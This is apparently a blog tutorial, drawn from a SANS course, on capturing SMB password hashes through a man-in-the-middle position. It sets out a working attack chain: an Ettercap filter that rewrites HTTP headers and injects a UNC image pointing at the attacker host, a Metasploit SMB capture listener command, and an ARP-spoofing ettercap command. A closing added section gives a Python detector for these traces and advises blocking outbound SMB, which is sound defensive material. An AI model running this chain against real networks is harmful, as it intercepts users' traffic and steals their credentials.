Man-in-the-Middle SMB Hash Capture with Ettercap and Metasploit

Today, I'll show you how to leverage a man-in-the-middle (MitM) position to alter the traffic coming back from a website and steal a victim's SMB credentials. I learned this attack from the SANS course SEC660.

  1. Write an Ettercap filter (or just copy and adjust the one below). This filter does a few things, explained in the comments. After you write it you need to compile it with the command etterfilter -o [output_file_name].ef [input_file_name].filter

Here is the filter I use for this attack:

# Find and replace Accept-Encoding with Accept-Nothing!
# We do not want encoded (compressed) traffic, because the <head> replace
# further down can only match plain-text HTML.
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        # note: the replacement string is the same length as the original string
        replace("Accept-Encoding", "Accept-Nothing!");
        msg("Replaced Accept-Encoding!\n");
    }
}

# Find and replace If-Modified-Since with If-Pacified-Since.
# We do not want the victim to be served cached content (a 304 Not Modified
# response carries no HTML body for the filter to rewrite).
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "If-Modified-Since")) {
        # note: the replacement string is the same length as the original string
        replace("If-Modified-Since", "If-Pacified-Since");
        msg("Replaced If-Modified-Since\n");
    }
}

# Replace the <head> tag in the server's response with
# <head> <img src="\\[attacker_IP]\p.gif">
# We want to insert a UNC path into the rendered page to force
# an SMB connection to the attacker host.
if (ip.proto == TCP && tcp.src == 80) {
    replace("<head>", "<head> <img src=\"\\\\[attacker_IP]\\p.gif\">");
    msg("Replaced head with head and image\n");
}

Compile the filter with etterfilter -o smb_capture.ef smb_capture.filter

  2. Start Metasploit and run the SMB capture server. This will create a Metasploit listener on port 445 with a server challenge. When the client connects, Metasploit will record the challenge and hash in a password-file format that JTR or Cain can read. I am using the JTR format.

msfconsole -x 'use auxiliary/server/capture/smb; set johnpwfile /tmp/passfile; exploit;'

  3. Establish your MitM with Ettercap and your new filter:

ettercap -TqM arp:remote -F smb_capture.ef /[victim]/ /[web_server]/

  4. Wait for your victim to browse to the web server. When the victim visits the web server, the Ettercap filter will intercept the HTTP traffic and replace the headers as well as the <head> tag. If you did everything correctly, you will see the messages you specified in your filter in the Ettercap terminal. You will also see the captured challenge/hash in Metasploit, and a file will be created with the hash and challenge that is ready to be fed into JTR.
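From the defender's side, the three substitutions the filter makes leave recognizable traces on the wire: request headers named Accept-Nothing! or If-Pacified-Since, which no real browser ever sends, and an <img> in the returned HTML whose src is a UNC path. The Python script below is an added example, not code from the original post, that checks raw HTTP messages for exactly those traces. The sample request, response and the 10.0.0.99 address inside them are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample messages (not captured from a real network) that carry
# the three in-flight substitutions described in the post.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Accept-Nothing!: gzip, deflate\r\n"
    "If-Pacified-Since: Sat, 01 Jan 2022 00:00:00 GMT\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><head> <img src="\\\\10.0.0.99\\p.gif"><title>Intranet</title></head>'
    "<body>hello</body></html>"
)
CLEAN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "If-Modified-Since: Sat, 01 Jan 2022 00:00:00 GMT\r\n"
    "\r\n"
)

# Header names that exist only because a same-length substitution rewrote a
# legitimate header in transit. No real browser emits these.
MANGLED_HEADERS = {"accept-nothing!", "if-pacified-since"}

# An <img> whose src is a UNC path (\\host\share\file). A Windows browser that
# renders it will try to open an SMB session to "host"; capture the host part.
UNC_IMG_RE = re.compile(r'<img[^>]*\ssrc\s*=\s*["\']?\\\\([^\\"\'>]+)\\', re.I)


def split_message(raw_http: str):
    """Return (header block, body) of a raw HTTP/1.x message."""
    head, _, body = raw_http.partition("\r\n\r\n")
    return head, body


def find_mangled_headers(raw_http: str) -> List[str]:
    """Header names in the message that match the known substitutions."""
    head, _ = split_message(raw_http)
    found = []
    for line in head.split("\r\n")[1:]:  # skip the request/status line
        name, sep, _ = line.partition(":")
        if sep and name.strip().lower() in MANGLED_HEADERS:
            found.append(name.strip())
    return found


def find_unc_images(raw_http: str) -> List[str]:
    """Hosts referenced by UNC-path <img> tags in the message body."""
    _, body = split_message(raw_http)
    return UNC_IMG_RE.findall(body)


def analyze(raw_http: str) -> Dict[str, object]:
    """Flag a message that shows signs of this kind of in-flight tampering."""
    mangled = find_mangled_headers(raw_http)
    unc_hosts = find_unc_images(raw_http)
    return {
        "mangled_headers": mangled,
        "unc_hosts": unc_hosts,
        "suspicious": bool(mangled or unc_hosts),
    }


if __name__ == "__main__":
    for label, message in (("request", SAMPLE_REQUEST),
                           ("response", SAMPLE_RESPONSE),
                           ("clean request", CLEAN_REQUEST)):
        print(label, analyze(message))
```

Run the two checks over HTTP reassembled by an inline sensor or proxy: a hit on either indicator means something between the client and the web server rewrote the exchange, and the captured UNC host tells you where the SMB connection was being steered. Independently of detection, the capture step itself needs the victim's outbound TCP 445 to reach the attacker host, so an egress rule blocking SMB to untrusted networks removes the payoff even when the injection succeeds.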

Here is a video demo:
